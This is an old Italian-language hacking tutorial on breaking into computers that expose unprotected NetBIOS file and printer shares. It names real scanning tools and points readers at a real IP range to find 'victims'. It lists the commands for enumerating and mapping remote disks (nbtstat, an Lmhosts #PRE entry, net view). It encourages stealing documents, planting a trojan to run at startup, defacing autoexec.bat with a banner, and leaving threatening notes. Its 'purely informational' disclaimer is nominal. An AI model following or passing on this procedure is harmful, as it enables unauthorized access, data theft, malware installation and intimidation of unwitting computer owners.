Hacking del netbios
Salve a tutti.
Nonostante ci siano molte guide su questa tecnica di
hacking, ho deciso di
illustrla brevemente e di "consigliare" un pò di
procedure "utili".
///////////////////////////// INTRODUZIONE \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Il netbios non è altro che un protocollo che serve per condividere risorse
(cartelle, interi hard disk, stampanti) in rete.
Questo protocollo viene
usato molto negli uffici o nel lavoro a distanza.
La condivisione delle
risorse può essere o meno protetta da password.
Per quanto ne sappia,
attualmente non esistono expoilt per aggirare questa
password, tuttavia ci
sono moltissimi computer con risorse condivise non
protette.
/////////////////////////////// L'OCCORRENTE \\\\\\\\\\\\\\\\\\\\\\\\\\\\
1) Un pc
2) i protocolli di rete attivati
3) un netbios scan (ce ne
sono moltissimi es: legion, scanus, nbtscan)
nb: scanus, degli spippolatori
(www.spippolatori.com), è ottimo. Infatti
questo die, non i probabili, ma i
netbios attivi sicuramente.
/////////////////////////// ATTIVARE I PROTOCOLLI \\\\\\\\\\\\\\\\\\\\\\\\\
cliccare sull'icona "risorse direte" con il tasto destro del mouse,
aggiungere
il protocollo "client per reti microsoft" e abilitare
"connessione rapida"
nelle sue opzioni.
Nelle proprietà della vostra
connessione attivate "accedi alla rete".
A questo punto il vostro pc è pronto
per l'hacking del neetbios. Ma voi lo
sarete?
Passiamo alla
procedura...
/////////////////////////////// PROCEDURA \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Per prima cosa dovrete trovare un pc con il netbios attivo.
Per le nostre
ricerche viene in aiuto un qualsiasi netbios scan. Questo non è
altro che un
programma che analizza dei rage di ip controllando la porta 139.
Vi consiglio
vivamente di ricercare le vostre "vittime" nel rage di ip
212.216.*.* che è
pieno di pc (e non solo...) con il netbios attivo e le
risorse
condivise.
Una volta trovato l'ip da "attaccare" aprite un prompt di ms-dos e
digitate
nbtstat -A xxx.xxx.xxx.xxx (ip che avete trovato).
Se vi dà un
messaggio di errore, probabilmente sulla macchina remota non vi è
il netbios
attivo.
In caso contrario, apparirà una tabella simile:
Name Type Status
---------------------------------------------
SERVER
<00> UNIQUE Registered
CASA <00> GROUP Registered
SERVER
<03> UNIQUE Registered
SERVER <20> UNIQUE Registered
UFFICIO
<1E> GROUP Registered
vedete quel 20 nella seconda colonna della quarta stringa?
anche
io.
:)
Di solito, i computer che hanno quel 20, hanno quasi probabilmente
risorse
condivise.
A questo punto aprite il file Lmhosts (senza estensione. Se non esiste
createlo) nella cartella di windows e aggiungete la seguente stringa:
ip_macchina nome_macchine #PRE
nel nostro caso:
xxx.xxx.xxx.xxx. SERVER #PRE
queste tre colonne sono divise dal tasto TAB. Usate solo questo per dividere
l'ip dl nome e dal #PRE.
Aprite di nuovo un prompt e digitate il comando nbtstat -R.
Dovrebbe
apparire il messaggio:
Successful purge and preload of the NBT Remote Cache
Name Table.
Se non appare, ripetete la procedura precedente.
Per vedere se la macchina remota abbia ha risorse condivise usate il comando
net view.
La sintassi è questa: net view \\NOME_MACCHINA
nel nostro
caso: net view \\SERVER
Se ci sono risorse condivise apparirà un a cosa del genere:
Condivisione
Tipo Commento
------------------------------------
STAMPANTE1
Stampa
HARD DISK Disco
STAMPANTE2 Stampa
Esecuzione comando
riuscita.
In questo caso la macchina condivide un disco e 2 stampanti.
Per montare
il disco apriamo gestione risorse andiamo in strumenti, e
selezionamio
connetti unità di rete.
Si aprirà una finestra nella qule dovrete scegliere
che unità sarà sul vostro
pc la risorsa condivisa e il percorso di
quest'ultima in questa forma:
\\Nome della macchina\nome condivisione
nel nostro caso:
\\SERVER\HARD DISK
Ora, avremo un nuovo Hard Disk, da cui potremo attingere informazioni
preziose, e se siamo fortunati, scriverci.
Per montare la stampante, dovremo fare la stessa cosa che per il disco, con
l'inconveniente che dovremo scaricare prima i driver per utilizzarla dal pc
remoto (la quale operazione richiede un pò di tempo).
/////////////////////// UN PÒ DI COSETTE SIMPATICHE \\\\\\\\\\\\\\\\\\\\\\\
avrete accesso ai documenti della vittima. Si scoprono tante cosette
simpatiche, a volte si trovano documenti utilissimi.
immaginate di avere accesso in scrittura al disco:
Potete inserire il server di un trojan in esecuzione automatica
Potete inserire alla fine dell'autoexec.bat una cosa del genere:
@echo sei stato hackato da
@echo ######
@echo ## ## #
@echo ## ##
##
@echo ## ## #### ######## ## ##
@echo ###### # ## ## ## ## ##
@echo
## ## #### ## ## ####
@echo ## ## ## ## ## ## ##
@echo ## ## ## ## ## ##
####
@echo ## ## ## ## ## ## ## ##
@echo ###### ##### ## ## ## ##
Potete lasciare dei file.txt sul desktop con dentro scritte minacce.
///////////////////////////// CONSIDERAZIONI \\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Tutto ciò appena detto è a puro scopo informativo.
Attenzione ai server.
Oltre che a utenti normali, ci sono anche dei server con
risorse condivise.
Questi sono molto pericolosi perchè loggano gli accessi e,
nel caso non
siano autorizzati, vi denunciano all'abuse del vostro provider.
by bartx